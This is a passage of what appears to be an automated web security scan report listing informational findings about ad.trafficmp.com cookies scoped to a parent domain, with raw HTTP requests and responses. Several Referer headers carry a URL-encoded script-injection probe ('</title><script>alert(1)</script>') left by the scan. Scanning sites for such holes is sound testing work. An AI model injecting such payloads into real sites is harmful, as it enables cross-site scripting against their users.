Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block


12.16. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 03 Feb 2011 19:12:57 GMT
Connection: close
Set-Cookie: T_1ean=9tc%3A0%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Set-Cookie: rth=2-lg22pl-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Set-Cookie: uid2=45fd1eda4-2d99-4f35-96df-d7009f04548c-gjq1nbbd; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:12:57 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.17. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Fri, 04 Feb 2011 01:52:39 GMT
Connection: close
Set-Cookie: T_h9m4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4mpe=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3q8t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ax3f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dk1b=9tc%3Aix4%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:52:39 GMT; Path=/
Set-Cookie: rth=2-lg22an-9tc~ix4~1~1-h0h~86c~1~1-h0l~86c~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:52:39 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.18. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1050&id=5&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 03 Feb 2011 19:03:59 GMT
Connection: close
Set-Cookie: T_4ffd=9tc%3A0%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: rth=2-lg22an-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.19. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:08 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fg2y=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_73th=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 13008

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

12.20. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 21:59:55 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_4ffd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1g6v=h0l%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: T_kjvx=h0h%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dly2=3-lg2afw-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Content-Length: 12998

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

12.21. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:34 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_fg2y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_73th=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3q8t=h0l%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: T_ax3f=h0h%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dly2=3-lg2agz-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Content-Length: 13010

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

12.22. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:08 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_1g6v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kjvx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ahzq=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_km24=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 12599

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

12.23. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23661 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:09 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dh48=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_3kcq=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~13hf80rcjfxxj~i99~4fq9~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 12598

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.22;sz=300x250;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKD_99*KEh_115*tlB_3443735*xel
...[SNIP]...

12.24. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
